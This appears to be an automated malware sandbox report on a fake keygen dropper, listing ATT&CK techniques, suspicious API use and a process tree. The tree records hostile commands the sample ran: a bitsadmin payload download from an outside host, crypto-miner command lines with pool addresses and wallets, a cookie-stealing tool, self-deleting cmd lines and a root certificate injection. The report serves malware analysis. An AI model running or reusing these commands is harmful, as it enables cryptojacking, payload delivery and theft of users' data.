T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	filee.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	filee.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
212	PING.EXE
2496	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
360	rundll32.exe
360	rundll32.exe
3264	svchost.exe
3264	svchost.exe
3464	ultramediaburner.tmp
3464	ultramediaburner.tmp
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe
3392	Rimyfyfeso.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4856	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeTcbPrivilege	3264	svchost.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	3384	JoSetp.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	360	rundll32.exe
Token: SeDebugPrivilege	2572	Ultra.exe
Token: SeAuditPrivilege	2336	svchost.exe
Token: SeDebugPrivilege	2252	Dishogyxoka.exe
Token: SeDebugPrivilege	3392	Rimyfyfeso.exe
Token: SeAssignPrimaryTokenPrivilege	2624	svchost.exe
Token: SeIncreaseQuotaPrivilege	2624	svchost.exe
Token: SeSecurityPrivilege	2624	svchost.exe
Token: SeTakeOwnershipPrivilege	2624	svchost.exe
Token: SeLoadDriverPrivilege	2624	svchost.exe
Token: SeSystemtimePrivilege	2624	svchost.exe
Token: SeBackupPrivilege	2624	svchost.exe
Token: SeRestorePrivilege	2624	svchost.exe
Token: SeShutdownPrivilege	2624	svchost.exe
Token: SeSystemEnvironmentPrivilege	2624	svchost.exe
Token: SeUndockPrivilege	2624	svchost.exe
Token: SeManageVolumePrivilege	2624	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2624	svchost.exe
Token: SeIncreaseQuotaPrivilege	2624	svchost.exe
Token: SeSecurityPrivilege	2624	svchost.exe
Token: SeTakeOwnershipPrivilege	2624	svchost.exe
Token: SeLoadDriverPrivilege	2624	svchost.exe
Token: SeSystemtimePrivilege	2624	svchost.exe
Token: SeBackupPrivilege	2624	svchost.exe
Token: SeRestorePrivilege	2624	svchost.exe
Token: SeShutdownPrivilege	2624	svchost.exe
Token: SeSystemEnvironmentPrivilege	2624	svchost.exe
Token: SeUndockPrivilege	2624	svchost.exe
Token: SeManageVolumePrivilege	2624	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2624	svchost.exe
Token: SeIncreaseQuotaPrivilege	2624	svchost.exe
Token: SeSecurityPrivilege	2624	svchost.exe
Token: SeTakeOwnershipPrivilege	2624	svchost.exe
Token: SeLoadDriverPrivilege	2624	svchost.exe
Token: SeSystemtimePrivilege	2624	svchost.exe
Token: SeBackupPrivilege	2624	svchost.exe
Token: SeRestorePrivilege	2624	svchost.exe
Token: SeShutdownPrivilege	2624	svchost.exe
Token: SeSystemEnvironmentPrivilege	2624	svchost.exe
Token: SeUndockPrivilege	2624	svchost.exe
Token: SeManageVolumePrivilege	2624	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2624	svchost.exe
Token: SeIncreaseQuotaPrivilege	2624	svchost.exe
Token: SeSecurityPrivilege	2624	svchost.exe
Token: SeTakeOwnershipPrivilege	2624	svchost.exe
Token: SeLoadDriverPrivilege	2624	svchost.exe
Token: SeSystemtimePrivilege	2624	svchost.exe
Token: SeBackupPrivilege	2624	svchost.exe
Token: SeRestorePrivilege	2624	svchost.exe
Token: SeShutdownPrivilege	2624	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3464	ultramediaburner.tmp

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2676	xiuhuali.exe
2676	xiuhuali.exe
4604	MicrosoftEdge.exe
4856	MicrosoftEdgeCP.exe
4856	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 2676	3976	keygen-step-4 — копия.exe	76
PID 3976 wrote to memory of 2676	3976	keygen-step-4 — копия.exe	76
PID 3976 wrote to memory of 2676	3976	keygen-step-4 — копия.exe	76
PID 2676 wrote to memory of 360	2676	xiuhuali.exe	78
PID 2676 wrote to memory of 360	2676	xiuhuali.exe	78
PID 2676 wrote to memory of 360	2676	xiuhuali.exe	78
PID 3976 wrote to memory of 3384	3976	keygen-step-4 — копия.exe	79
PID 3976 wrote to memory of 3384	3976	keygen-step-4 — копия.exe	79
PID 360 wrote to memory of 3264	360	rundll32.exe	71
PID 3264 wrote to memory of 1840	3264	svchost.exe	80
PID 3264 wrote to memory of 1840	3264	svchost.exe	80
PID 360 wrote to memory of 2536	360	rundll32.exe	28
PID 3264 wrote to memory of 1840	3264	svchost.exe	80
PID 360 wrote to memory of 1008	360	rundll32.exe	64
PID 360 wrote to memory of 2376	360	rundll32.exe	32
PID 360 wrote to memory of 2336	360	rundll32.exe	33
PID 360 wrote to memory of 1064	360	rundll32.exe	57
PID 360 wrote to memory of 964	360	rundll32.exe	60
PID 360 wrote to memory of 1368	360	rundll32.exe	9
PID 360 wrote to memory of 1824	360	rundll32.exe	41
PID 360 wrote to memory of 1236	360	rundll32.exe	54
PID 360 wrote to memory of 1260	360	rundll32.exe	52
PID 360 wrote to memory of 2624	360	rundll32.exe	24
PID 360 wrote to memory of 2632	360	rundll32.exe	11
PID 3976 wrote to memory of 2392	3976	keygen-step-4 — копия.exe	81
PID 3976 wrote to memory of 2392	3976	keygen-step-4 — копия.exe	81
PID 3976 wrote to memory of 2392	3976	keygen-step-4 — копия.exe	81
PID 2392 wrote to memory of 3076	2392	Install.exe	82
PID 2392 wrote to memory of 3076	2392	Install.exe	82
PID 2392 wrote to memory of 3076	2392	Install.exe	82
PID 3076 wrote to memory of 2572	3076	Install.tmp	83
PID 3076 wrote to memory of 2572	3076	Install.tmp	83
PID 2572 wrote to memory of 3104	2572	Ultra.exe	87
PID 2572 wrote to memory of 3104	2572	Ultra.exe	87
PID 2572 wrote to memory of 3104	2572	Ultra.exe	87
PID 3104 wrote to memory of 3464	3104	ultramediaburner.exe	88
PID 3104 wrote to memory of 3464	3104	ultramediaburner.exe	88
PID 3104 wrote to memory of 3464	3104	ultramediaburner.exe	88
PID 3464 wrote to memory of 2648	3464	ultramediaburner.tmp	89
PID 3464 wrote to memory of 2648	3464	ultramediaburner.tmp	89
PID 2572 wrote to memory of 2252	2572	Ultra.exe	90
PID 2572 wrote to memory of 2252	2572	Ultra.exe	90
PID 2572 wrote to memory of 3392	2572	Ultra.exe	91
PID 2572 wrote to memory of 3392	2572	Ultra.exe	91
PID 3976 wrote to memory of 4180	3976	keygen-step-4 — копия.exe	93
PID 3976 wrote to memory of 4180	3976	keygen-step-4 — копия.exe	93
PID 3976 wrote to memory of 4180	3976	keygen-step-4 — копия.exe	93
PID 4180 wrote to memory of 4920	4180	filee.exe	99
PID 4180 wrote to memory of 4920	4180	filee.exe	99
PID 4180 wrote to memory of 4920	4180	filee.exe	99
PID 4180 wrote to memory of 212	4180	filee.exe	157
PID 4180 wrote to memory of 212	4180	filee.exe	157
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102
PID 212 wrote to memory of 4912	212	PING.EXE	102

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2536

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:360
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3384
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Users\Admin\AppData\Local\Temp\is-GOUUB.tmp\Install.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GOUUB.tmp\Install.tmp" /SL5="$9007A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\is-7TUK6.tmp\Ultra.exe
      "C:\Users\Admin\AppData\Local\Temp\is-7TUK6.tmp\Ultra.exe" /S /UID=burnerch1
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Users\Admin\AppData\Local\Temp\LSXRGFSHJV\ultramediaburner.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LSXRGFSHJV\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3104
      - C:\Users\Admin\AppData\Local\Temp\is-4RG4A.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4RG4A.tmp\ultramediaburner.tmp" /SL5="$301C4,281924,62464,C:\Users\Admin\AppData\Local\Temp\LSXRGFSHJV\ultramediaburner.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3464
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        7⤵
        Executes dropped EXE
        
        PID:2648
    - - C:\Users\Admin\AppData\Local\Temp\80-eb1e9-a96-c3491-ca91c688c001e\Dishogyxoka.exe
        
        "C:\Users\Admin\AppData\Local\Temp\80-eb1e9-a96-c3491-ca91c688c001e\Dishogyxoka.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
    - - C:\Users\Admin\AppData\Local\Temp\ba-aed6b-71b-085b2-0dbcdbf33c795\Rimyfyfeso.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ba-aed6b-71b-085b2-0dbcdbf33c795\Rimyfyfeso.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4jf1dm1s.lm5\instEU.exe & exit
        6⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\4jf1dm1s.lm5\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\4jf1dm1s.lm5\instEU.exe
        7⤵
        Executes dropped EXE
        
        PID:4404
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onfnhohk.0jf\google-game.exe & exit
        6⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\onfnhohk.0jf\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\onfnhohk.0jf\google-game.exe
        7⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        8⤵
        
        PID:5832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppn3c2g0.mvp\y1.exe & exit
        6⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\ppn3c2g0.mvp\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ppn3c2g0.mvp\y1.exe
        7⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\sOOUr4dqXw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sOOUr4dqXw.exe"
        8⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Roaming\1619336108048.exe
        
        "C:\Users\Admin\AppData\Roaming\1619336108048.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619336108048.txt"
        9⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\sOOUr4dqXw.exe"
        9⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Runs ping.exe
        Suspicious use of WriteProcessMemory
        
        PID:212
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ppn3c2g0.mvp\y1.exe"
        8⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        9⤵
        Delays execution with timeout.exe
        
        PID:5468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nup1rowo.uto\askinstall39.exe & exit
        6⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\nup1rowo.uto\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\nup1rowo.uto\askinstall39.exe
        7⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:5912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wyu2ptx.2gj\inst.exe & exit
        6⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\3wyu2ptx.2gj\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\3wyu2ptx.2gj\inst.exe
        7⤵
        
        PID:4756
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixpogdoy.opm\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\ixpogdoy.opm\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\ixpogdoy.opm\SunLabsPlayer.exe /S
        7⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB7FD.tmp\tempfile.ps1"
        8⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:5532
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wauowkmr.e3z\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:5812
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bwx2em4j.vfg\toolspab1.exe & exit
        6⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\bwx2em4j.vfg\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\bwx2em4j.vfg\toolspab1.exe
        7⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\bwx2em4j.vfg\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\bwx2em4j.vfg\toolspab1.exe
        8⤵
        
        PID:4944
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekvvzevb.d2h\c7ae36fa.exe & exit
        6⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\ekvvzevb.d2h\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\ekvvzevb.d2h\c7ae36fa.exe
        7⤵
        
        PID:5900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\antybra5.cuj\app.exe /8-2222 & exit
        6⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\antybra5.cuj\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\antybra5.cuj\app.exe /8-2222
        7⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\antybra5.cuj\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\antybra5.cuj\app.exe" /8-2222
        8⤵
        
        PID:4200
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Users\Admin\AppData\Roaming\5E71.tmp.exe
    "C:\Users\Admin\AppData\Roaming\5E71.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4920
  - - C:\Users\Admin\AppData\Roaming\5E71.tmp.exe
      "C:\Users\Admin\AppData\Roaming\5E71.tmp.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:4324
- - C:\Users\Admin\AppData\Roaming\6103.tmp.exe
    "C:\Users\Admin\AppData\Roaming\6103.tmp.exe"
    3⤵
    PID:212
  - - C:\Windows\system32\msiexec.exe
      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3183@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
      4⤵
      PID:4912
  - - C:\Windows\system32\msiexec.exe
      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9718 --cpu-max-threads-hint 50 -r 9999
      4⤵
      Blocklisted process makes network request
      PID:4956
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
    3⤵
    PID:5004
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:2496
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
  2⤵
  - Executes dropped EXE
  PID:6056
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
  2⤵
  PID:4020
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:4400
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:964

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1008

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
